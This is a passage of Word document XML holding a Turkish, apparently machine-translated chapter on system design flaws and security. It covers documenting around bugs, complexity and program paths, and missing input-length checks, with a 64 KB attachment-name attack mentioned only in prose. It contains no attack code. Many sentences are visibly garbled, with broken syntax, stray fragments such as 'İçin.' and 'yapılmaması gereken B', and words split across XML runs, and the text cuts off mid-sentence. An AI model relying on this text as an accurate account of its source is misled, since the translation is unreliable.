          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Programı değiştirmek yerine belgeleri değiştire</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rek yapılırdı. Programı düzeltmek yerine,</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> aksi halde meşru olan girdilerin belirli bir kombinasyonu </w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>programın başarısız olm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>asına neden olmaz, programcılar</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> “Bu giriş kombinasyonunu girmeyin, çünk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ü aşağıdakilere neden olabilir;</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> öngörülemeyen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sonuçlar. “ </w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Genellikle, bu sonuçlar o kadar tahmin edilemezdi ki, yıkıcı olsalar bile sömürülmezdi. Her zaman ve sonra, sonuç kötü amaçlı amaçlar iç</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>in sömürülebilecek bir sonuçtu.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bir uygulamanın doğru davranışının sağlanan girdiye bağlı olm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ası alışılmadık değildir. Bazen</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> programın doğru girişi sağlamak için kullanıcıya bağlı olması. Program kul</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lanıcıya yapmasını söyleyebilir</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ve yapılmaması gereken B. Bunu yaptıktan sonra, program kullanıcının her zaman söylediği gi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">bi yapacağı gibi davranır. İçin. </w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Örneğin, programcı, alfa karakterleri sayısal olarak belirtilen belirli bir alana koymanın fa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rkında olabilir. </w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Programın başarısız olmasına neden olabilir. Programcı, ekrana veya e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>krana bir uyarı bile verebilir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bu alana yalnızca sayısal karakterler koyun.” yazan belgeler. Progra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mcının yaptığı şey bu değildir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Verileri kontrol edin veya alfa verilerinin hataya neden olmaya</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cağı şekilde girişi sınırlayın.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tabii ki, pratikte, nadiren uygulamanın başarısız olmasına neden olan tek bir </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>girdidir. Daha sık, belirli bir</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> nadiren bile olsa, arızaya sebep olan girdilerin kombinasyonu. Programcıy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a bu kadar nadir gibi görünüyor</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> birleşim asla gerçekleşmeyecek ve programlanmaya değmez.</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KARMAŞA</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Karmaşıklık kendi başına bir hata değildir. Ancak, bilgisayardaki her zaman birincil hat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a kaynaklarından biri olmuştur.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Programları. Karmaşıklık bazı hatalara neden olur ve kötülüğü maskelemek için kullanılabilir. Sadelik, anlayışı maksimuma çıka</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rır ve kötülüğü ortaya çıkarır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bir programın kapsamını sınırlamak, karmaşıklığını sınırlamak ve bunu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sağlamak için yeterli değildir</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> niyeti açıktır. Bir program kapsamını ne kadar fazla sınırlarsa, yaptığı şey o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> kadar açık olacaktır. Üzerinde ö</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>te yandan, bir tanesi tüm programların kapsamını ne kadar fazla sınırlarsa, o kadar f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>azla program o kadar sona erer.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> İnsanoğlu karmaşık şeyleri daha iyi ve daha basit hale getirerek</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> onların anlayışını geliştirir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Parçalar. Bir bilgisayar programının atomik birimi bir talimattır. Programla</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ma hakkında düşünmenin bir yolu</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> bir programı atomik talimatlarına bölme sanatıdır. Biri </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tüm programları bire düşürmekse</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ler birine talimat verildiğinde, o zaman tüm programlar basit ve anlaşılması kolay olacaktır, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ancak birçok program olacaktır</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ve aralarındaki ilişkiyi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>anlamak karmaşık ve zor olurdu.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Büyük programlar mutlaka kısa programlardan daha karmaşık olmayabilir. Ancak, bir kur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>al olarak, daha büyük bir</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> program, anlamak daha zor. Bir bilgisayarın boyutuna veya ka</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>psamına bağlı bir üst kısım var</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> bir insan tarafından anlaşılabilecek bir prog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ram. Programın boyutu arttıkça,</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bunu anlayabilen insanlar sıfıra yaklaşır ve bu anlayış için </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gereken sürenin uzunluğu</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sonsuzluğa yaklaşır. Biri tam olarak bu geçişin nerede</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> olduğunu söyleyemese de, değil</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> gerekli. Bu noktaya ulaşmadan çok önce, </w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>program modülleri yararlı işle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r yapacak kadar büyük olabilir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mesele, programların yararlı işler yapacak kadar büyük ve yeterince küçük </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>olacak bir dengeye oturtulması.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kolayca anlaşılmak. Konfor bölgesi, 10 ile 50 arasında fiil ve biri arasında olmalıdır</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tam işlev ve bir sayfa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF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Bir programın karmaşıklığının bir başka ölçüsü, programın içinden geçen toplam yol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sayısıdır. Basit bir program </w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>üstündeki girişinden altındaki çıkışına kadar bir yolu vardır. Birkaç program bu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> şekilde görünüyor; çoğu olacak </w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bazı yinelemeli döngüler içlerinde. Bununla birlikte, toplam yol sayısı düşük seviyelerde olduğu gibi hala numaral</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>andırılabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF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AU1997_Frame_Ch126 Sayf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a 1548 14 Kasım 2003 Cuma 06:03</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003A072B"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Genel Sistem Tasarım Hata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ları ve Güvenlik Sorunları 1549 </w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bu döngüler sadece sıra ile birbirlerini takip ettikleri veya kucakladıkları ancak geçmedikl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">eri sürece. Yollar başladığında </w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>çapraz, toplam olası yol sayısı hızla artar. Sade</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ce anlamak daha zor hale gelmez. </w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Her bir yol ne yaparsa, bir yolun kullanılıp kullanılmadığını (yani gerekli olup olmadığını) bilmek zorlaşır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D06048"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EKSİK PARAMETRE KONTROLÜ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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Eksik Parametre Kontrolü Uygulaması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001E2328"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Girdi parametrelerinin kontrol edilmemesi, Birinci Günden bu yana uygulama hatalarına</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> neden oldu. Modern sistemlerde u</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>zunluğu kontrol etmeme büyük bir güvenlik açığıdır. Her ne kadar modern veri tabanlarının</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> uzunluğu çok hassas olmasa da,</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> çoğu sistem giriş uzunluğuna</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> bir dereceye kadar duyarlıdır. </w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yakın tarihli bir saldırı, e-posta ekinin 64 KB’den uzun bir ad vermesini i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>çeriyordu. Empoze etmek yerine</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> isteğe bağlı bir kısıtlama olarak, tasarımcı, uzunluğun dinamik olarak atanacağını be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lirtmişti. Altında uzunluklarda</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>64 KB, program iyi çalıştı; Bunun üzerindeki uzunluklarda, giriş pr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
